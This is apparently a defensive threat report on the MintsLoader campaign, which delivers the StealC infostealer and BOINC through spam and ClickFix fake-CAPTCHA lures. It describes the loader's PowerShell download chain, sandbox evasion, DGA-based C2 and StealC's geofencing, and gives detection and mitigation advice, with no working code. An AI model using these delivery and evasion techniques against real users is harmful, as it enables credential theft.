Full Report
Threat hunters have detailed an ongoing campaign that leverages a malware loader called MintsLoader to distribute secondary payloads such as the StealC information stealer and a legitimate open-source network computing platform called BOINC. "MintsLoader is a PowerShell based malware loader that has been seen delivered via spam emails with a link to Kongtuke/ClickFix pages or a JScript file,"
Analysis Summary
# Tool/Technique: MintsLoader
## Overview
MintsLoader is a malware loader, primarily based on PowerShell, used in an ongoing campaign to distribute secondary payloads, notably the StealC information stealer and the BOINC network computing platform. It is often delivered via spam emails linking to Kongtuke/ClickFix pages or through an obfuscated JScript file.
## Technical Details
- Type: Malware Loader
- Platform: Windows (implied by PowerShell usage)
- Capabilities: Download and execute secondary payloads, sandbox evasion, resistance to analysis, C2 communication via DGA.
- First Seen: Activity detected in early January 2025.
## MITRE ATT&CK Mapping
*Note: Mappings are inferred based on described functionality (loading, persistence evasion, C2 communication).*
- **TA0001 - Initial Access**
- T1566 - Phishing
- T1566.001 - Spearphishing Attachment (via initial spam email/JS download)
- **TA0002 - Execution**
- T1059 - Command and Scripting Interpreter
- T1059.001 - PowerShell
- **TA0005 - Defense Evasion**
- T1027 - Obfuscated Files or Information (Used in initial JScript/Loader)
- **TA0011 - Command and Control**
- T1568 - Dynamic Resolution
- T1568.002 - Domain Generation Algorithms
## Functionality
### Core Capabilities
- Initial delivery via spam emails linking to Kongtuke/ClickFix style pages or direct download of an obfuscated JScript file.
- Executes a PowerShell command to download and run the core MintsLoader payload via `curl`.
- Self-deletes after execution to remove traces.
- Contacts a C2 server to fetch interim PowerShell payloads.
### Advanced Features
- **Sandbox and Analysis Evasion:** Performs various checks to detect and resist analysis attempts (sandboxes).
- **Domain Generation Algorithm (DGA):** Utilizes a DGA where the seed value is determined by the addition of the current day of the month to generate C2 domain names.
## Indicators of Compromise
*Note: Specific hashes, file names, and precise C2 indicators are not provided in the source text.*
- File Hashes: [N/A in source]
- File Names: [N/A in source, likely obfuscated]
- Registry Keys: [N/A in source]
- Network Indicators: C2 servers resolved via DGA (seed based on day of month, defanged)
- Behavioral Indicators: Execution of PowerShell downloaded via `curl`, self-deletion post-execution, communication utilizing DGA patterns.
## Associated Threat Actors
- Unknown (Associated with the campaign targeting electricity, oil and gas, and legal sectors in the US and Europe).
## Detection Methods
- Signature-based detection: Detecting known PowerShell download/execution artifacts associated with this tool.
- Behavioral detection: Monitoring for suspicious PowerShell execution chains initiated by initial access vectors (email links/JScript). Monitoring for DGA-related network patterns.
- YARA rules: [N/A in source]
## Mitigation Strategies
- Spam filtering and user training to avoid clicking links in suspicious emails.
- Implementing robust endpoint detection and response (EDR) to monitor PowerShell command-line arguments and script block logging.
- Network defense systems looking for DGA communication patterns.
- (Related to delivery via Kongtuke/ClickFix) Educating users on techniques that trick them into pasting and executing scripts in the Run prompt.
## Related Tools/Techniques
- **StealC:** Secondary payload distributed by MintsLoader.
- **BOINC:** Secondary payload sometimes distributed by MintsLoader.
- **Kongtuke/ClickFix:** Delivery mechanism often leveraged to execute the initial access script loop.
---
# Tool/Technique: StealC
## Overview
StealC is an information stealer malware sold under the Malware-as-a-Service (MaaS) model. It is being deployed as a secondary payload by MintsLoader in recent campaigns.
## Technical Details
- Type: Malware (Information Stealer)
- Platform: Windows (implied)
- Capabilities: Stealing sensitive information.
- First Seen: Sold as MaaS since early 2023.
## MITRE ATT&CK Mapping
*Note: Mappings are inferred based on the description of an information stealer.*
- **TA0009 - Collection**
- T1005 - Data from Local System
## Functionality
### Core Capabilities
- Collects sensitive information from compromised systems.
- Distributed via MintsLoader loader malware.
### Advanced Features
- Re-engineered from another stealer known as [Arkei](https://thehackernews.com/2023/06/darkvault-malware-stealer-evolution.html).
- **Geofencing:** Avoids infecting machines located in Russia, Ukraine, Belarus, Kazakhstan, or Uzbekistan.
## Indicators of Compromise
- File Hashes: [N/A in source]
- File Names: [N/A in source]
- Registry Keys: [N/A in source]
- Network Indicators: Implied C2 communication for exfiltration (defanged)
- Behavioral Indicators: File access and data staging indicative of credential or data theft.
## Associated Threat Actors
- Consumers of the Malware-as-a-Service offering.
## Detection Methods
- Signature-based detection: Targeting known file hashes or binaries for StealC.
- Behavioral detection: Monitoring for access patterns typical of credential harvesting.
## Mitigation Strategies
- Restricting the use of MaaS tools via robust monitoring.
- Implementing application whitelisting to control execution of unknown executables.
## Related Tools/Techniques
- **MintsLoader:** Loader used for deployment.
- **Arkei:** Predecessor/base for StealC.
---
# Technique: ClickFix / Kongtuke Co-option
## Overview
ClickFix and Kongtuke refer to social engineering techniques used to trick users into manually copying and pasting malicious PowerShell scripts into the Windows Run dialog box (`Win+R`) for execution. This is often done by displaying fake CAPTCHA verification prompts.
## Technical Details
- Type: Initial Access / Execution Technique
- Platform: Windows
- Capabilities: Bypassing standard security controls by leveraging user interaction to execute code via the Run prompt.
- First Seen: Part of a spike in associated malicious campaigns (context implies recent relevance, early 2025).
## MITRE ATT&CK Mapping
- **TA0001 - Initial Access**
- T1566 - Phishing (Specifically leveraging deceptive UIs)
- **TA0002 - Execution**
- T1059 - Command and Scripting Interpreter
- T1059.001 - PowerShell (The executed payload)
## Functionality
### Core Capabilities
- Websites displaying fake "verify you are human" pages after a user clicks a link from a spam email.
- Injecting or loading a malicious PowerShell script into the user's Windows copy/paste buffer.
- Providing explicit instructions to the user to paste and execute this script in the Run window.
### Advanced Features
- Dynamic loading of fake forum content from an external server ("mothership") in the case of GootLoader (though the technique is described broadly here).
## Indicators of Compromise
- Behavioral Indicators: User interaction leading to execution of code pasted directly into the Run prompt, especially following interaction with phishing links.
## Associated Threat Actors
- Threat actors utilizing MintsLoader.
- Used in campaigns abusing fake CAPTCHA prompts.
## Detection Methods
- Behavioral detection: Monitoring for execution of scripts or commands originating from the Run dialog (`cmd.exe` or `powershell.exe` parented by `explorer.exe` or Run dialog context).
- EDR monitoring of script block logging for pasted content being executed.
## Mitigation Strategies
- User education emphasizing the extreme danger of pasting and executing unknown scripts sourced from web pages, even in the Run dialog.
- Restricting use of the Run dialog for non-standard operations if feasible in the environment.
## Related Tools/Techniques
- **MintsLoader** (Distributed via this path).
- **GootLoader campaigns** (Utilize similar deceptive hosting to lure execution).